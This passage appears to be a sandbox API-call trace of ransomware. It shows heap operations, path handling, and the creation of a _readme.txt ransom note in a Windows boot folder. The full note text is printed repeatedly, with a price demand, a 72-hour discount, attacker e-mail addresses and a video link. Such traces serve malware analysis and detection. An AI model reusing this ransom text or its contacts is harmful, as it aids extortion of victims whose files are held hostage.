(HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.299] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.299] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.299] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.299] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.299] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.299] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.299] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.299] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.299] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.299] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.299] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.299] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.299] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.299] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.300] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.300] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.300] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.300] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.300] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.300] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.300] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.300] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.300] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.300] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.300] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.300] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.300] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.300] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.300] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.300] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.300] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.300] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.300] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.300] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.300] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.300] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.300] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.300] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.300] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.300] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.300] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.300] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.300] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.300] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.300] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.300] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.300] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.300] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.301] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.301] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.301] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.301] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.301] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.301] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.301] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.301] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.301] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.301] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.301] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.301] PathFindFileNameW (pszPath="C:\\Boot\\pt-PT\\") returned="pt-PT\\" [0056.301] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0056.301] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.301] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.301] PathFindFileNameW (pszPath="") returned="" [0056.301] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.301] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.301] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.301] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.302] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.302] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0056.302] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.302] PathAppendW (in: pszPath="C:\\Boot\\pt-PT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0056.302] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.302] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.302] PathFileExistsW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 0 [0056.302] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7d00) returned 0x9c82710 [0056.302] lstrcpyW (in: lpString1=0x9c82710, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0056.302] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0056.302] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5e2e0 [0056.302] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\_readme.txt" (normalized: "c:\\boot\\pt-pt\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0056.302] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0056.302] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x85d) returned 0x326aa18 [0056.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326aa18, cbMultiByte=2141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 1118 [0056.302] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x32acff0 [0056.302] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0056.303] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.303] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 1117 [0056.303] WriteFile (in: hFile=0x5c8, lpBuffer=0x32acff0*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x9f4fb64, lpOverlapped=0x0 | out: lpBuffer=0x32acff0*, lpNumberOfBytesWritten=0x9f4fb64*=0x45d, lpOverlapped=0x0) returned 1 [0056.303] CloseHandle (hObject=0x5c8) returned 1 [0056.304] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0056.304] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5e2e0 | out: hHeap=0x660000) returned 1 [0056.304] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0056.304] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.304] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.304] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.304] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.304] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.304] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0056.304] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec2a390, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0056.304] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec2a390, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0056.304] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.304] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.304] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eef0 | out: hHeap=0x660000) returned 1 [0056.304] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.304] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.304] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.304] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.304] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.304] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.304] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.304] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.304] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.304] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.305] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.305] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.305] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.305] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.305] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.305] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.305] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.305] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.305] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.305] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.305] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.305] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.305] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.305] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.305] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.305] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 